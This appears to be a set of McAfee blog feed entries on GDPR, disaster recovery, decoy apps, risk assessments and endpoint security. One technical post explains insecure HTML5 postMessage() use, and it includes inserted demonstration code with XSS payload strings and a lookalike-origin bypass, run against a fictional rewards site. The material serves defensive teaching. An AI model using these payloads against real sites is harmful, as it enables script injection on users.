  • Protecting cloud environments. SaaS (Software-as-a-Service) and cloud-hosted applications pose particular difficulties for GDPR readiness. Often, however, separate enterprise and cloud security solutions are used, which can create gaps in visibility and protection. Consider a unified security system that lets you easily extend protection, detection and correction capabilities to cloud environments.
  • Optimizing security operations. Many security operations centers lack the capabilities needed to detect data breaches and respond effectively. Since one of the primary requirements of GDPR readiness is that the company notify any data breach within three days, it is essential to develop a tactical incident management plan for these centers. Orchestration technologies can also help close gaps and speed up incident response.


This is the framework I recommend: start with the four dimensions of the security strategy to arrive at a culture of security and privacy by design.

The second part of this framework describes how security must be approached to achieve the desired GDPR readiness outcomes.

Preparing for the GDPR coming into force must inevitably be among the top priorities of security leaders and senior executives throughout the year. They will need to direct their investments accordingly and implement new programs or solutions that will allow their company to be in step with this new, stricter regulatory environment.

How prepared are you?

The post Preparing for GDPR in 2017 – Part Two: Building a Culture of Privacy and Security by Design appeared first on McAfee Blogs.

Avoiding a data disaster: could your business recover from human error?
https://securingtomorrow.mcafee.com/business/safeguard-data/avoiding-a-data-disaster-could-your-business-recover-from-human-error/
Tue, 30 May 2017 19:11:23 +0000

The post Avoiding a data disaster: could your business recover from human error? appeared first on McAfee Blogs.

“Data.” Ask senior management at any major organization to name their most critical business asset and they’ll likely respond with that one word.

As such, developing a disaster recovery strategy – both for data backup and restoration – is a central part of planning for business continuity management at any organization. It is essential that your company and the vendors you work with can protect against data loss and ensure data integrity in the event of catastrophic failure – whether from an external event or human error.

Think about this: What would you do if one of your trusted database administrators made a mistake that wiped out all of your databases in one fell swoop? Could your business recover?

Backing up data at an off-site data center has long been a best practice, and that strategy relates more to the disaster recovery (DR) component of business continuity management (BCM). DR and BCM go hand in hand, but there is a difference: BCM is about making sure the enterprise can resume business quickly after a disaster. DR falls within the continuity plan and specifically addresses protecting the IT infrastructure – including systems and databases – that organizations need to operate.

While replicating data off-site is smart, it doesn’t fully address human error, which can be an even greater risk for businesses than a major external catastrophe. The human error factor is why a two-pronged approach to disaster recovery makes sense. Backing up customer data off-site means it is protected from a major uncontrollable event like a natural disaster. But a local strategy is also essential to ensure there are well-trained people, defined processes and the right technology in place to reduce the risk of human error.

Think automation and consider the cloud

Automation of backups (making a copy of the data), replication (copying and then moving data to another location), off-site verification and restoration processes are the most effective ways to address the risk of human error.

Storage replication mirrors your most important data sets between your primary site and your DR site or service. Most, if not all, mainstream storage vendors provide this functionality out of the box or for a license fee. The replication should support scheduling replication events, mirroring data sets in line with your recovery point objective (RPO), and archival services that allow systems administrators to set up policies that match your business continuity objectives (e.g., six months of off-site monthly archives). For added protection, consider FIPS-certified encryption at the disk or controller level, which protects your most critical and sensitive data against accidental exposure by encrypting it at rest.

You can also use WAN acceleration technologies to speed up your off-site replication and/or backups: they maximize the efficiency of your replication or backup streams, saving both bandwidth and the time needed to replicate your changes off-site. Used in combination with storage replication, this makes for a very secure and resilient architectural approach to data protection, and in some cases can help lower recurring expenses.

Another choice, where storage replication is not available, is to use your persistent storage solutions (RDBMS or NoSQL) to replicate changes in real time, as most best-of-breed products ship with data replication and backup services by default. Spending the time up front to understand which solution is most effective from a cost and execution standpoint is advisable, as there are bound to be differences driven by compliance requirements.

In addition, investing in automation tools and services can greatly improve your response to an unplanned disaster, but does require a solid foundation of configuration management standards to successfully deploy and validate your configuration items (network hardware, storage appliances, server technology, etc.). A dedicated team of DevOps resources can be most effective in this area as Infrastructure as Code continues to gain widespread adoption. Imagine for a moment that instead of troubleshooting failures, you can simply re-provision to a previously certified configuration. Not only are you proving your ability to respond in the face of a disaster, but you may even benefit from automating your infrastructure builds, where applicable, by re-purposing valuable time and resources for other important work.

If you have the right automation in place, with an expected input and an expected output verified through repeatable processes, you mitigate the risk that an engineer or a database administrator will inadvertently push the wrong button and create a data disaster.

The traditional approach is to invest in server, network and storage hardware, and co-location. But you should also consider the major cloud services – Amazon’s AWS, Microsoft Azure or Google Cloud Platform – that allow you to back up your most important data straight to the cloud. It’s another way of investing in disaster recovery without necessarily incurring the cost of buying data centers or hardware.

Companies of all sizes face pressure from investors and customers who want assurance that sensitive data will be protected correctly no matter what happens – from credit card numbers to personally identifiable information (PII). As a cloud-based software provider, I know how important it is that customers have confidence that their data are protected at all times.

Following are some top questions to ask cloud vendors:

Are they investing in automation? Your vendor should be investing in automation to support its own DR plan. A vendor’s own fortified technology foundation and strong security framework can help you meet your own stringent data requirements.

Are they seeking third-party assessments? Ask about their verification processes. They should be engaging an independent assessor twice yearly to verify the efficacy of BCM and DR processes for both U.S. and non-U.S. operations. Testing them twice a year is important because the software space is always changing, and these assessments help to ensure that BCM and DR plans stay fresh.

Are they making assessor reports available to you? Any vendor should make the independent assessor’s reports available to customers – ask to see them. Documentation of specific security certifications can provide additional evidence that their BCM and DR processes are effective.

Are they focused on recovery time? A recovery point objective (RPO) is the maximum targeted period in which data might be lost due to a major incident. Ask where your vendor falls in its industry segment. Similarly, ask about their recovery time objective (RTO), the targeted duration within which they can restore their service after a disaster. Many providers guarantee a two- to three-day average restoration time frame.

Just as you are concerned about data loss and integrity for your own business, you should seek the same from any vendor. Test and refine your own processes, and make sure your vendors do too.


This article was written by Mark Goldin from NetworkWorld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Why Kids Use Secret Decoy Apps and Why Parents Should Care
https://securingtomorrow.mcafee.com/consumer/family-safety/kids-use-secret-decoy-apps-parents-care/
Tue, 30 May 2017 14:00:35 +0000

The post Why Kids Use Secret Decoy Apps and Why Parents Should Care appeared first on McAfee Blogs.

Kids have been locking their diaries and hiding top-secret shoeboxes since long before Sandy Olsson had a crush on Danny Zuko. The need for more and more privacy as they mature is a natural part of growing up. Today, however, some kids hide their private lives behind locked decoy apps, catapulting those harmless secret crushes to a whole new level.

A decoy app is what it sounds like; it’s a mobile app designed for the purpose of hiding something. Decoy apps are also called vault, secret, and ghost apps and make it tough for parents to know whether or not their kids are taking and sharing risky photos with peers since the apps are disguised as an everyday app.

A decoy app may look like a calculator, a game, or even a utilities icon, but it's actually a place to tuck away content a phone user doesn't want anyone to find. Kids use decoy apps to store screenshots of racy conversations, nude photos, pornographic videos, and party photos that are simply too risky to keep in a regular photo folder that mom or dad may find. One case in Pennsylvania documents vault apps at the center of a sexting and cyberbullying case in a middle school.

Adults and Decoy Apps

Many adults are also well acquainted with decoy apps. It's no surprise adults use these stealth apps to store private business activity, passwords to secret accounts, inappropriate photos, and content related to extramarital affairs. Apps such as Vaulty Stocks look like a Wall Street stock market tracker, but in reality they are designed to keep private photos and videos hidden from nosy spouses.

How to Spot a Decoy App

If you want to get an idea of how many of these decoy apps exist, go to the iOS or Android app store and search for "secret apps" or "decoy apps"; you will get your fill of the many icons designed to hide someone's private digital life.

Once you know to look for these apps designed to look like a calculator, a safe, a game, a note or even a shopping list app, you are well on your way.

A decoy app can't be opened without a code or password specified by the original user. Some of these decoy apps, such as Keep Safe Private Photo Vault, actually have two layers of security (two passwords) designed to throw off a parent who can open the first level and find only harmless content. According to the app description on the Google Play store, "Keepsafe secures personal photos and videos by locking them down with PIN protection, fingerprint authentication, and military-grade encryption. It's the best place for hiding personal pictures and videos." Further privacy is detailed with the promise of a face-down auto-lock feature: "In a tight situation? Have Keepsafe lock itself when your device faces downward." The description of another app, The Secret Calculator, states: "Don't worry about the icon. It will become a standard calculator icon. No one will ever notice."

Other features highlighted in the Keepsafe app description include:

  • Break-In Alerts: Takes photos of intruders and tracks break-in attempts
  • Secret Door: Disguises your Keepsafe as another app
  • Fake Pin: Creates a decoy Keepsafe with a separate PIN code

How to Discourage Decoy Apps

Connection first. Communication and a strong relationship with your child are the most cyber savvy tools you have to keep your child from making unwise choices online. So, take time each day to connect with your child. Understand what makes them tick, how they use technology, and what’s going on in their lives and hearts.

Monitoring. Weekly phone monitoring and using parental controls is always a good idea depending on the age of your child, your trust level, and the expectations that exist within your family. Know what apps your kids download.

Ask to Buy. Both Apple and Android have parental app purchase approval options on their websites that you can set up to examine an app before it's downloaded.

Get real. Talk candidly about the risks of sending, sharing, and even archiving risky photos on digital devices. Under the law, child pornography is considered to be any nude photograph or video of someone under the age of 18. It usually does not matter if the person possessing or distributing it is under the age of 18. Any offender can face fines and time behind bars. New laws that address juveniles caught possessing or distributing explicit photos are emerging every day and vary state by state.

Reality check. Nothing is private. Kids can share content directly from a decoy app, which means that their passcode is useless. Shared content is out of your hands forever. Sharing risky photos is never, ever a good idea.

It's worth stressing to your kids that it's not just about the technology you use, but how you use it, that can create issues. None of the decoy apps we mentioned in this post are inherently "dangerous" apps; it's the way the apps are used that makes them unsafe for kids. The same mantra applies to social networks. And remember — give yourself grace as a parent. You can't police your child's online activity 24/7. It's impossible. What you can do is educate yourself and know what these mobile apps do so you can address precarious situations that may come up.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

Risk assessments for local governments and SMBs
https://securingtomorrow.mcafee.com/business/optimize-operations/risk-assessments-for-local-governments-and-smbs/
Fri, 26 May 2017 18:55:15 +0000

The post Risk assessments for local governments and SMBs appeared first on McAfee Blogs.

Next week, I am scheduled for a semi-annual risk assessment with my dentist. He performs a very specific, highly focused type of risk assessment that is totally worth the $125 it will cost. In addition to performing specialized maintenance (hypersonic cleaning), he will provide a threat assessment (for oral cancer, cavities, periodontal disease and other anomalies). I’ll leave his office confident that my mouth is in a low-risk situation for the next six months as long as I continue to follow best practices and perform daily maintenance procedures. I am only vulnerable to these threats if I fail to follow a daily program of brushing and flossing.

I could always choose to save the small fee for these risk assessments and wait for a major dental disaster to occur. The problem with this approach is that a single incident may cost thousands of dollars if I need a root canal or some other type of procedure. Ten years of checkups are less costly than even a single disaster.

Enterprise IT risk assessments

Unfortunately, in the world of local government and SMBs, the most common approach to risk management is to allow a major catastrophe to occur before realizing the value of an enterprise risk management program.

I am at a loss to explain it. Incidents or problems involving your information and IT infrastructure are far more costly than risk management programs. Data loss, breaches, major downtime, malware, lawsuits and fines for compliance violations may cost hundreds of thousands or millions of dollars. They can permanently shut down your small business or really irritate your board of directors in a corporate environment. In the public sector, constituents pay for major screw-ups through increased taxes while the events are often covered up and the culprits skirt the blame and keep their jobs.

When was your organization’s last risk assessment? Can you put your hands on the report? If you haven’t had a risk assessment recently, it’s a safe bet that your policies are sorely lacking. Defining an organizational policy for risk assessment is an essential component of any comprehensive suite of security policies. Both HIPAA and GLBA require periodic risk assessments, but it is a sound practice for all types and sizes of organizations.

Where to start?

If you haven't previously conducted an enterprise IT risk assessment, you should carefully consider your starting point. For example, if you have few or no security policies, it may be wise to form an IG (information governance) committee and begin by developing a comprehensive set of policies, procedures, standards and guidelines. On the other hand, your management team may benefit from the kind of wake-up call that a devastatingly thorough risk assessment can produce. A 100-page report that says you suck at security and risk management on every page may be just what you need to get everyone's attention.

The results of a risk assessment should be used to reduce your organization’s risk exposure, improve CIA (confidentiality, integrity and availability), initiate positive change, and begin building a security culture. While using risk assessments as a punitive device isn’t the best approach, such reports often expose malfeasance and incompetence of proportions so vast that appropriate consequences are in order. In other words, if you have been paying a CIO $200,000 and the assessment uncovers gaping policy, security and privacy holes, you should certainly replace the CIO with one who has the required skill set.

Scope the project carefully

Risk assessments come in a lot of flavors, and the specific purpose and scope must be worked out with the auditors in advance. A few years ago, a client of mine released an RFP for a risk assessment after we worked extensively on the development of their information security policies. The proposals ranged from $15,000 to well over $150,000. This can happen even with a pretty clear scope. Big 4 firms, for instance, have hourly rates that may be several times what local, independent practitioners charge. NIST SP 800-30 provides valuable information on how to perform risk assessments, including some information on scoping.

Risk assessments may be qualitative or quantitative. You may be able to do some of the quantitative work in-house by gathering cost data for all your assets in advance of the assessment. Regardless of the scope and approach, the auditors will ask to see lots of documentation.

Positive outcomes

One positive outcome of a risk assessment is that it may force your management team to rethink EVERYTHING – in-house application development, infrastructure support, IT staffing & responsibilities, LOB (line of business) staffing & responsibilities, budgets, and just about everything else related to the manner in which your organization is run.

Risk assessments are way cheaper than disasters, so go schedule your checkup.


This article was written by Jeffrey Morgan from CIO and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

What security leaders need before applying intelligence to cyber
https://securingtomorrow.mcafee.com/business/optimize-operations/what-security-leaders-need-before-applying-intelligence-to-cyber/
Thu, 25 May 2017 20:04:26 +0000

The post What security leaders need before applying intelligence to cyber appeared first on McAfee Blogs.

What does it take to successfully apply the process of intelligence to the field of cyber security?

Or perhaps we need to consider what happens when our efforts don’t produce the outcomes we seek. What really needs to happen?

John Boling has some ideas. John recently shared his insights in Do we really need higher education to solve our perceived and actual security needs? Since that piece got people talking, I reached out to see if he wanted to step up and try out my new Security Slapshot series … and he stepped up to take a shot.

John Boling (@CySocSci) is a security veteran who followed his own path to success. Currently working as a Senior Security Consultant, he started on the front lines supporting MS-DOS and Windows before completing degrees from the University of North Carolina at Charlotte and the National Intelligence University. A conforming contradiction, he boldly blends business, technology, and social science to understand security threats.

Here’s his Security Slapshot on applying intelligence to security:

SLAPSHOT: Intelligence is NOT failing because of data or people, but from a lack of direction.

How do you get to a destination without knowing where you are going?

You can have the best maps and algorithms, but without knowing the desired destination how does a path emerge? As a result, many programs meander. Sometimes, an adequate destination appears, however many times it does not.

The reference model for the intelligence process is found in the US Department of Defense publication Joint Intelligence (JP 2-0). Much like the OSI Reference Model for networking, this represents the core understanding an intelligence professional should hold. While variances occur, all start with some sort of requirement, followed by collecting and processing data such that it can be analyzed, and finish with a reporting mechanism. Each component of this process serves a purpose and needs feedback for refinement.

As a system, the intelligence process often fails from lack of direction.

The solution is discipline to the process. The industry must recognize that intelligence emerges from a system with clear objectives. No mystery exists on processes that develop quality intelligence products, but expectations should be measured. Give your analyst clear direction outlining what questions need answers for the organization. Build data collection and processing engines to support their analysis based on those requirements. I would incorporate the following in any intelligence program:

My Take (some color commentary)

I frequently point out the three keys of leadership including articulating the current situation accurately, painting a picture of a better tomorrow to set the direction, and then offering individuals a pathway that elevates and accelerates them.

Seems the proper application of intelligence principles requires a similar focus. In the process, the organization benefits as individuals thrive. The challenge lies in embracing the situation and translating the value of the intelligence process into the picture of a better tomorrow.


This article was written by Michael Santarcangelo from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work
https://securingtomorrow.mcafee.com/business/mcafee-ens-swedish-town-gains-secure-environment-requiring-less-work/
Thu, 25 May 2017 14:00:06 +0000

The post With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work appeared first on McAfee Blogs.

For Jens Lindström, who oversees security operations for Norrköpings Kommun, a Swedish town of 140,000 inhabitants, ransomware was becoming his nemesis. “With the increasing pace of ransomware attacks, I was beginning to imagine a day in the not-too-far-off future when all my time would be dedicated to dealing with ransomware attacks,” he muses. “Thankfully, we implemented McAfee ENS before that could happen.”

The need to bolster endpoint protection and thwart ransomware ultimately drove this Swedish municipality to migrate the McAfee VirusScan Enterprise engine, McAfee Host Intrusion Prevention, and McAfee SiteAdvisor® functionality of its McAfee Complete Threat Protection suite to McAfee Endpoint Security (ENS) version 10.2 not long after it became available. Soon after the ENS 10.2 deployment, ENS version 10.5 became available, and the organization upgraded to it to take advantage of its Real Protect machine learning technology in addition to its Dynamic Application Containment technology.

According to Lindström, migration of the town's 14,000 endpoints to McAfee ENS 10.2 took only a few hours each day for about a week. "With the help of our partner Advania and the McAfee migration tool, [migration to McAfee ENS] was extremely straightforward and not complicated at all," says Lindström. "First, we rolled it out to all our schools, then we moved on to the administrative networks."

Happily, Lindström’s hopes for improved endpoint protection with McAfee ENS were fulfilled. “Our single biggest driver for migrating to McAfee ENS and our biggest benefit thus far has been better protection,” notes Lindström. “Since implementing ENS, we have seen a dramatic reduction in infected systems and ransomware attacks.”

Improved protection means Lindström spends less time fighting fires, which enables him to do his job more efficiently and effectively. In addition, the improved graphical user interface in McAfee ENS helps him every day in the security administrator part of his job. “Dealing with endpoint security has become much easier and more streamlined since we migrated,” he says. “I can quickly see what tasks require action and more easily do many of those tasks, such as push updates across the enterprise.”

Of course, making security administration easier is not the Municipality’s top priority; protecting services and information for the town’s citizens is. However, with McAfee ENS, Norrköpings Kommun has a more secure environment while requiring less time and effort of its very limited information security staff.

To read the full case study on Norrköpings Kommun and its McAfee ENS implementation, click here. Get your questions answered by tweeting @McAfee_Business.

Security Risks Arise From Insecure Implementations of HTML5 postMessage() API
https://securingtomorrow.mcafee.com/technical-how-to/security-risks-arise-insecure-implementations-html5-postmessageapi/
Thu, 25 May 2017 03:15:40 +0000

The post Security Risks Arise From Insecure Implementations of HTML5 postMessage() API appeared first on McAfee Blogs.

]]>
In this post we are going to have a look at the security risks arising from insecure implementations of the HTML5 postMessage() API. Before we discuss how this cross-origin messaging API works, we must understand a few important concepts, such as the same-origin policy and the security risks associated with cross-origin communication.

Same-origin policy

The origin of a page is decided by three unique factors: hostname, protocol, and port number. For example, http://test.com and https://test.com have different origins because the protocol is different. Similarly, http://one.test.com and http://two.test.com have different origins because the hostnames are different. The origin property is also different for two services running on the same host with different port numbers, for example, http://test.com:8081 and http://test.com:8082 are different origins.

The same-origin policy (SOP) is a browser-level security control that dictates how a document or script belonging to one origin can interact with a resource from another origin. In short, SOP prevents a script running in one origin from reading responses or DOM content belonging to another origin. Cross-origin requests can still be sent (form submissions, navigations, and the loading of resources), but the responses cannot be read by script unless the other site explicitly opts in. SOP also does not prevent resources hosted on other domains from being embedded in a page through <script> tags, cascading style sheets, and <img> tags.

In a world without SOP, the Internet would not be very safe. Imagine you are logged into your bank’s website and simultaneously are accessing a news site in another tab. If the news site can read data from your bank’s site, you do not have to be a security expert to understand the risk.

Need for cross-origin communication

SOP has done a good job of protecting users from unauthorized cross-origin data access, though like many other security controls it does not boost usability. The Internet has evolved beyond individual websites serving content and has become more distributed. The need arose to enable secure cross-origin communication so that services hosted on different domains can talk to each other. The postMessage() API, introduced with HTML5, tries to provide a safe mechanism for this. (There are other methods for cross-origin communication, such as CORS, which uses HTTP response headers, but we will not discuss those here.)

Cross-origin messaging

The Window.postMessage() method, introduced in HTML5, allows JavaScript code running on different origins to communicate with each other in a bidirectional manner. This API can be used for communication between an iframe and its parent document. Similarly, it can be used by an HTML page and a child window to exchange messages, such as an embedded third-party video notifying its parent frame when the user pauses the video. Let’s look at some code snippets to better understand how cross-origin messaging works.

Consider an HTML page hosted on http://www.test.com that contains an iframe element pointing to http://www.child-frame.com. The parent frame can use the postMessage() call on the window object of the iframe to send a message.

// The following JavaScript code is part of the parent document
// iframe example
var iframe = document.getElementsByTagName('iframe')[0];
iframe.contentWindow.postMessage("hello", "*");

// OR

// pop-up window example
var ref = window.open("http://www.child-frame.com");
// Note: the new window has not finished loading at this point, so a message sent
// immediately may arrive before the child has registered its listener and be lost.
ref.postMessage("hello", "*");

In the preceding code snippet the iframe element is fetched, and in the next step the contentWindow property of the iframe is accessed, which returns a reference to the iframe's window object. The postMessage() call takes two parameters: the message and the target origin. The wildcard "*" means the message is delivered to whatever origin happens to be loaded in that window.

In the pop-up window example, in which messages are to be exchanged between the parent document and a child pop-up window, the reference returned by window.open() can be used to call the postMessage() API.

// The following JavaScript code is part of the child frame
window.addEventListener('message', msgHandler);

function msgHandler(event) {
  // The sender's origin and the data received are displayed
  alert(event.origin + ' says: ' + event.data);
}

On the receiving end, we need to have an event listener to listen for an incoming message. The preceding msgHandler() method is triggered when an event is received. The dispatched message contains certain properties that can be accessed by using the event object reference:

  • event.data: Object sent from the sender window (arrays, strings, numbers and other JavaScript objects are supported)
  • event.origin: Origin of the sender window
  • event.source: A reference to the window object of the sender window. This can be used to send a message to the sender window.

Risk analysis and protection measures

Let’s look at a couple of elements from a developer’s perspective:

  • It is important to specify the origin of the target window when sending a cross-origin message, to ensure that the message is received only by the intended recipient.
  • On the receiving end, it is important to validate the origin of the sender to confirm that the message came from a trusted window. The browser sets event.origin; the sender cannot forge it, so it is the one property a receiver can rely on.
  • Using the received data in the client-side logic without validation may open the door to script-injection attacks.

The API specification provides very clear guidelines to developers for securely using the postMessage() API. (See the specification linked under Reference below.) The code snippets shown earlier do not follow these best practices. Let's look at the compliant code snippets.

// The following JavaScript code is part of the parent document
var iframe = document.getElementsByTagName('iframe')[0];
// The postMessage call specifies the target origin rather than using a wildcard
iframe.contentWindow.postMessage("hello", "http://www.child-frame.com");

The preceding code explicitly names the target origin. The earlier example used a wildcard, which offers no guarantee that the message will be delivered to the intended origin: if the window has since navigated elsewhere, whatever site is loaded there receives the message. This matters most when an iframe or a pop-up sends data back to its parent or opener, because a malicious site can open a legitimate website in a pop-up or iframe and thereby become that parent or opener.

Similarly, on the receiving end, the authors should check if the message is received from an expected origin. Along with origin verification, it is important to perform input validation on the data received from the other domain before using it in the client-side logic. The compliant code solution for the receiving end follows:

// The following JavaScript code is part of the child frame
window.addEventListener('message', msgHandler);

function msgHandler(event) {
  // The sender's origin is validated with an exact string comparison.
  // Avoid indexOf(), startsWith() or loose regular expressions here: they also
  // match attacker-controlled origins such as http://www.test.com.evil.example.
  if (event.origin === "http://www.test.com") {
    if (event.data === "hello") {
      // Do some action after validating the message content
    }
  }
}
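The following is an added example, not code from the original post, showing the receiver-side checks as functions that run without a browser: an exact-match origin allowlist (with the substring check that is a common mistake shown for contrast) and a payload check before the data is used. The allowlisted origin reuses the post's fictional http://www.test.com; the sample events, the realbadhacker.com origin and the name-format rule are assumptions for the illustration.

```javascript
// Added example (not from the original post): origin and message validation for a
// postMessage receiver, written as pure functions so it runs under Node without a DOM.
// The allowlisted origin reuses the post's fictional http://www.test.com.

const TRUSTED_ORIGINS = ["http://www.test.com"];

// Correct: an origin is "scheme://host[:port]" and must match an allowlist entry exactly.
function isTrustedOrigin(origin, allowlist = TRUSTED_ORIGINS) {
  return allowlist.includes(origin);
}

// Incorrect (shown for contrast): a substring check is a classic postMessage bug.
// It accepts any origin that merely contains the trusted host name.
function isTrustedOriginBuggy(origin) {
  return origin.indexOf("www.test.com") !== -1;
}

// Validate the payload before acting on it. Returns the accepted name or null.
// The demo passes a user name, so only short plain-text names are accepted; the
// character rule is an assumption for this example.
function acceptGreeting(data) {
  if (typeof data !== "string") return null;
  if (data.length === 0 || data.length > 64) return null;
  if (!/^[\p{L}\p{N} .'-]+$/u.test(data)) return null; // rejects markup characters
  return data;
}

// Receiver logic: given a MessageEvent-like object, return the validated name or null.
function handleGreeting(event) {
  if (!isTrustedOrigin(event.origin)) return null;
  return acceptGreeting(event.data);
}

// Constructed sample events standing in for real MessageEvents.
const fromParent = { origin: "http://www.test.com", data: "Alice" };
const fromLookalike = { origin: "http://www.test.com.evil.example", data: "Alice" };
const fromAttacker = { origin: "http://www.realbadhacker.com", data: "<img src=x onerror=alert(1)>" };
const fromParentBadData = { origin: "http://www.test.com", data: "<img src=x onerror=alert(1)>" };

function demo() {
  return {
    legit: handleGreeting(fromParent),                                  // "Alice"
    lookalike: handleGreeting(fromLookalike),                           // null
    attacker: handleGreeting(fromAttacker),                             // null
    badData: handleGreeting(fromParentBadData),                         // null
    buggyAcceptsLookalike: isTrustedOriginBuggy(fromLookalike.origin),  // true
  };
}
```

In a page, wire handleGreeting() in as window.addEventListener('message', e => { const name = handleGreeting(e); if (name) el.textContent = 'Welcome, ' + name; }). Note that isTrustedOriginBuggy() happily accepts http://www.test.com.evil.example, which is exactly why the comparison must be exact.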

Demonstration of an attack

Consider the (fictional) credit card rewards program website https://www.acmerewards.com, which is running a promotional campaign. Customers are asked to play a quick game of Sudoku with the week’s highest scorers receiving reward points. The game is hosted on https://play.acmerewards.com. This URL opens as a pop-up from the main site’s home page.

The link to this game is shown to customers after they are authenticated. Once the pop-up opens, the main site passes the name of the current user to the pop-up window. The game window uses this to create a welcome message.

The vulnerability arises because the pop-up window assumes that it will always receive the message from www.acmerewards.com and therefore validates neither the sender's origin nor the contents of the message. Because any HTML page can open the pop-up window, the message can be sent from any malicious domain. The message can contain JavaScript, which then runs in the context of https://play.acmerewards.com, resulting in script injection that can be exploited in many ways. We will use a locally deployed application to demonstrate this attack. The initial screenshots show the expected application behavior; the final one shows the script-injection attack delivered through a post message.

Screenshot 1: The home page (www.acmerewards.com) of the rewards application. Clicking the PLAY button opens a pop-up window.

Screenshot 2: The pop-up window opens (play.acmerewards.com). Clicking OK in the sender window (www.acmerewards.com) sends the post message to the pop-up window. The two windows have different origins.

Screenshot 3: The string "username" is sent as a message from the sender window and is used by the pop-up window to build a welcome message.

Screenshot 4: The final exploit scenario, in which a malicious website (www.realbadhacker.com) opens a pop-up window pointing to the legitimate URL and passes a cross-site scripting payload instead of the user name. The script runs in the context of the target domain, which the user trusts.

The attack takes place completely on the client side; there is no interaction with the server. This "client XSS" (DOM-based XSS) avoids any server-side control that might have detected or blocked it: both the source and the sink of the attack are in the browser, and the injected script is never sent to the server. The fix therefore belongs in the client-side code: validate the sender's origin with an exact comparison, validate the data received, and write the value into the page through a non-HTML sink such as textContent rather than innerHTML or document.write().

The code for this demo application can be found here. Code samples provided in this post have been tested with Mozilla Firefox Version 52.0.1.
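The scenario above, worked through in an added example that is not the demo application's code: a minimal FakeWindow models how a browser delivers postMessage() (including the targetOrigin rule), and the vulnerable and fixed versions of the game page are run against a legitimate opener and an attacker-controlled one. The FakeWindow class, its explicit sender parameter, the payload string and the score message are assumptions of the simulation.

```javascript
// Added example (not from the original post or its demo application): an in-process
// simulation of the acmerewards pop-up scenario. FakeWindow stands in for a browser
// window so the exchange can run under Node. The explicit "sender" parameter is an
// assumption of the simulation; a real browser knows the calling window and sets
// event.origin itself, which is why a receiver can trust that property.

class FakeWindow {
  constructor(origin) {
    this.origin = origin;   // origin of the document loaded in this window
    this.listeners = [];
    this.rendered = "";     // stands in for the DOM the page writes into
  }
  addEventListener(type, fn) {
    if (type === "message") this.listeners.push(fn);
  }
  // Browser rule: deliver only if targetOrigin is "*" or exactly equals this window's
  // current origin; otherwise the message is silently dropped. Returns whether delivered.
  postMessage(data, targetOrigin, sender) {
    if (targetOrigin !== "*" && targetOrigin !== this.origin) return false;
    const event = { data, origin: sender.origin, source: sender };
    for (const fn of this.listeners) fn(event);
    return true;
  }
}

const MAIN_ORIGIN = "https://www.acmerewards.com";
const GAME_ORIGIN = "https://play.acmerewards.com";
const ATTACKER_ORIGIN = "https://www.realbadhacker.com";
// Constructed XSS payload standing in for the user name.
const PAYLOAD = '<img src=x onerror="alert(document.domain)">';

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable game page: no origin check, data concatenated straight into HTML (the sink).
function openVulnerableGame() {
  const win = new FakeWindow(GAME_ORIGIN);
  win.addEventListener("message", e => {
    win.rendered = "<h1>Welcome, " + e.data + "!</h1>";
  });
  return win;
}

// Fixed game page: exact origin check, type check, and HTML escaping before rendering
// (in a real page, assign to textContent instead of building HTML at all).
function openFixedGame() {
  const win = new FakeWindow(GAME_ORIGIN);
  win.addEventListener("message", e => {
    if (e.origin !== MAIN_ORIGIN) return;
    if (typeof e.data !== "string") return;
    win.rendered = "<h1>Welcome, " + escapeHtml(e.data) + "!</h1>";
  });
  return win;
}

function runScenarios() {
  const main = new FakeWindow(MAIN_ORIGIN);
  const attacker = new FakeWindow(ATTACKER_ORIGIN);

  // 1. Expected flow: the main site opens the game and passes the user name.
  const g1 = openVulnerableGame();
  g1.postMessage("username", GAME_ORIGIN, main);

  // 2. Attack: realbadhacker.com opens the same legitimate URL and sends a payload.
  //    The vulnerable page renders it, so the markup lands in the game's origin.
  const g2 = openVulnerableGame();
  g2.postMessage(PAYLOAD, GAME_ORIGIN, attacker);

  // 3. Same attack against the fixed page: rejected by the origin check, nothing rendered.
  const g3 = openFixedGame();
  g3.postMessage(PAYLOAD, GAME_ORIGIN, attacker);

  // 4. Even from the trusted origin, markup is neutralised by the escaping.
  const g4 = openFixedGame();
  g4.postMessage(PAYLOAD, GAME_ORIGIN, main);

  // 5. Sender side: if the game page replies to its opener with targetOrigin "*", an
  //    attacker-controlled opener receives the data; an explicit targetOrigin is dropped.
  let leaked = null;
  attacker.addEventListener("message", e => { leaked = e.data; });
  const wildcardDelivered = attacker.postMessage("score=9000", "*", g3);
  const strictDelivered = attacker.postMessage("score=9000", MAIN_ORIGIN, g3);

  return {
    legit: g1.rendered,
    attackRendered: g2.rendered.includes("onerror"),
    fixedBlocked: g3.rendered === "",
    fixedEscaped: g4.rendered,
    wildcardDelivered,
    strictDelivered,
    leaked,
  };
}
```

Scenario 2 is the screenshot above reproduced in code: the legitimate URL is opened by the wrong opener and the payload reaches the HTML sink. Scenario 5 shows the mirror-image problem from the sending side, which is why both the targetOrigin argument and the event.origin check matter.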

Reference

https://html.spec.whatwg.org/multipage/comms.html#web-messaging


]]>
The modern guide to staying safe online https://securingtomorrow.mcafee.com/business/neutralize-threats/the-modern-guide-to-staying-safe-online/ Wed, 24 May 2017 22:15:17 +0000

The post The modern guide to staying safe online appeared first on McAfee Blogs.

]]>
The internet can be a scary place. Threats come in many forms, lurking in practically any corner. Worse, yesterday’s prevailing advice for staying safe online – avoid dodgy websites, don’t traffic in stolen or illegal goods, interact only with people you know – no longer holds. Phishing emails from supposed family members, spyware piggybacking on legitimate apps, well-known sites hijacked with malicious code – digital safety clearly needs new rules to meet today’s evolving threatscape.

Considering how much of our digital lives occurs online – communications, financial transactions, entertainment, work, education, to name a few – adopting even a few safe browsing practices can lead to broad benefits. And this includes how we deal with email messages as well, given how popular email is as a delivery mechanism for online attacks using exploit kits and malware.

Here, we provide a strategic guide for staying safe online, outlining what you can do to protect your data and privacy on the web, while remaining productive.

Understand your threat profile

